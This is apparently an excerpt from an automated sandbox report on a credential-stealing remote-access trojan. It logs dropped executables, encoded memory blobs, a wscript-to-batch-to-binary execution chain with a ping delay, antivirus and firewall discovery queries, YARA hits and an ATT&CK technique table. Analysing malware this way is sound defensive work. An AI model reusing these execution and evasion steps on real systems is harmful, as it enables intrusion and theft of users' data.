                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3248413645.0000000012D19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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
                                  Source: wscript.exe, 00000002.00000002.2180003068.00000000032AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3248413645.0000000012C19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: utyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3249842299.000000001B350000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware18NDMH1XWin32_VideoControllerY9NW_VBFVideoController120060621000000.000000-00017497634display.infMSBDA7KTEMOCRPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemuser-PC1280 x 1024 x 4294967296 colorsS2W36O4K
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3248413645.0000000012D19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: axzpJdFIUOgoa85qsUCgb5A1B9t8Pv7oKDmQIMW1wLYDVooFo81h6LQIf5AvDfUFwo2B5tjjaE+LaCF4ol4oAmZfeGwv7EvFOrtDffFjGYtS/X3J6jTM/XnJgYT6WSMuqI90zkcHQait6+5IRBriPUFoO/8WszfDDXQQiF/LAat9MdjcWhxKAb1SCS0xng8FmrUEoHmpmAMOl1rDPYFGxJ9zVpvc7whHGuCLomzDYlonLXGAUluH4xHE/2ro4PRrYk4G0nG2fLRwehAMrY6MbwtFWcD/LEhMdQfjSXY2qFlqXgC826IDm5NsLbBePvgjtTFCbY0sTU5qOPty5OZoVQGTY1tGBkcTg4kViQT/fGV0cH4FIuXYPASmVT/juk87AZuC9MzdoFdTM+Wwzk3McyVrEinBqZ4KJHDac+0D25IAXJ+cjCeujSzdCTZP6yzpoolS+ASncOjQK9Lp2KJTCaXhdJrogMcoVZiUew8NFHCkL8hMTySHiQydSmMcTZhXTQNeYd1Dq/40mgmwZb1pwDyfgQqnYgOJ5Yn+hNb4amT0Cp+9p7lrx7pB4uJZoaznNZhkOgdGU5szMAAZymw7KGhNLSkvT8ezQxM8VszmcRAb//oimR/AlwgA2Y5lbgsNTCU7I+irW5I9Ed3EpaZSteHB8UgqTfZnxwenUrFvtyYSXRuS/T3t+1MxCgHGOLSUUC60qPQHOo01mkgw9GtLJYa7EtuNZylaxu0PA5NBsOLpQjBQcUeawrxzmDZbmGro8Pb2DoE2NWrEoNbh/EsoTUzOhhbFu3v743GLmYxA+lKRwczfan0wIrkYLR/aX8KeHqxnVDbNDSmfh3ojSWHov2G3UwxUCHriib7USFZYXQw2ZfIDKOJjqRjCahUIjoAYzyQSo/qBDk6lKAXBI8BsAaYAlr7t6agxG0DUK3kAGtflh4dGk5lq8hwLueGmhiOxqPD0S7wu0G2OjnIoOI0MEblNyT69AmGtaa3whIwOLx2ZHhtHzlw285YYojSwHWj/cn42iFYIpAxlbICCowO50qCvQIbbb19sC+lmy2haDc6b6A3kSY0a+Oc4i4Ek1t6mBjLtkXT0B5Ix17TF6nhFFHtq2hKJLI+xiE9VqcGk/g0HCNG/WPQYBw6HR8ZGBjtGRpOG72xPBndOpjKgJtksABqRGZq0shke43bcj23+US6M5HekYSK6zMgZVmeTCewNklO8jkjo9eBdwB0fsZwxgxbCkYDhrmiP7oVCtLfmxnjlaHxxN7IGJ60MtEPw0HKs52YMXpwyre7YFVMDGfIw4whhmqkBkExW9u7HSrJUvwBE9En7aK+bSA5zNp2Amgn5wCThZmEpfmjbXBHMp0aRK28iiPpNOJQqxwU/WxDKgXqcWSx9B0JfII3QPZhGLEdiTX4Z8MMV0Y8Fr80PXLx6lXR1RBT+NNLh1b2N+3a2Lq1tXekf+2y5hFqEu/PNSnucmB+yeEkmOquRGs6HR39hI9yV9majg5tGyWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WE
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3249842299.000000001B379000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0089E6A3 VirtualQuery,GetSystemInfo,0_2_0089E6A3
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0088A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0088A69B
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0089C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0089C220
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008AB348 FindFirstFileExA,0_2_008AB348
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008A7DEE mov eax, dword ptr fs:[00000030h]0_2_008A7DEE
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0089F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0089F838
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008AC030 GetProcessHeap,0_2_008AC030
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeMemory allocated: page read and write | page guardJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0089F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0089F838
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0089F9D5 SetUnhandledExceptionFilter,0_2_0089F9D5
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0089FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0089FBCA
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008A8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008A8EBD
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewruntimeMonitor\oYwPDBVe3AuHG3t6JLon5FNZVJrzPzwK1qz3t5qd93gftXcSil5zO.vbe" Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" "Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe C:\reviewruntimeMonitor/BlockrefBrokerperf.exeJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe "C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe" Jump to behavior
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002B9A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0089AF0F
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeQueries volume information: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe VolumeInformationJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeQueries volume information: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0089F654 cpuid 0_2_0089F654
                                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0089DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0089DF1E
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0088B146 GetVersionExW,0_2_0088B146
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3249842299.000000001B403000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                                  Stealing of Sensitive Information

                                  barindex
                                  Source: Yara matchFile source: o9jDrpZrgR.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.o9jDrpZrgR.exe.657270c.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.BlockrefBrokerperf.exe.fc0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000003.2000894449.0000000004DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.2000527838.0000000006E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000005.00000000.2180051762.0000000000FC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.1999993579.0000000006524000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: o9jDrpZrgR.exe PID: 4308, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: BlockrefBrokerperf.exe PID: 5520, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: qBJICEqiLNwXNBLrN.exe PID: 6604, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED

                                  Remote Access Functionality

                                  barindex
                                  Source: Yara matchFile source: o9jDrpZrgR.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.o9jDrpZrgR.exe.657270c.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.BlockrefBrokerperf.exe.fc0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000003.2000894449.0000000004DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.2000527838.0000000006E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000005.00000000.2180051762.0000000000FC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.1999993579.0000000006524000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: o9jDrpZrgR.exe PID: 4308, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: BlockrefBrokerperf.exe PID: 5520, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: qBJICEqiLNwXNBLrN.exe PID: 6604, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
                                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                                  Valid Accounts141
                                  Windows Management Instrumentation
                                  1
                                  DLL Side-Loading
                                  12
                                  Process Injection
                                  13
                                  Masquerading
                                  OS Credential Dumping1
                                  System Time Discovery
                                  Remote Services11
                                  Archive Collected Data
                                  Exfiltration Over Other Network Medium1
                                  Encrypted Channel
                                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
                                  Default Accounts2
                                  Command and Scripting Interpreter
                                  Boot or Logon Initialization Scripts1
                                  DLL Side-Loading
                                  1
                                  Disable or Modify Tools
                                  LSASS Memory361
                                  Security Software Discovery
                                  Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                                  Non-Application Layer Protocol
                                  SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                                  Domain Accounts11
                                  Scripting
                                  Logon Script (Windows)Logon Script (Windows)241
                                  Virtualization/Sandbox Evasion
                                  Security Account Manager2
                                  Process Discovery
                                  SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
                                  Application Layer Protocol
                                  Data Encrypted for ImpactDNS ServerEmail Addresses
                                  Local Accounts1
                                  Native API
                                  Login HookLogin Hook12
                                  Process Injection
                                  NTDS241
                                  Virtualization/Sandbox Evasion
                                  Distributed Component Object ModelInput CaptureTraffic DuplicationProtocol ImpersonationData DestructionVirtual Private ServerEmployee Names
                                  Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                                  Deobfuscate/Decode Files or Information
                                  LSA Secrets1
                                  Application Window Discovery
                                  SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
                                  Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                                  Scripting
                                  Cached Domain Credentials1
                                  Remote System Discovery
                                  VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
                                  External Remote ServicesSystemd TimersStartup ItemsStartup Items31
                                  Obfuscated Files or Information
                                  DCSync1
                                  System Network Configuration Discovery
                                  Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
                                  Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
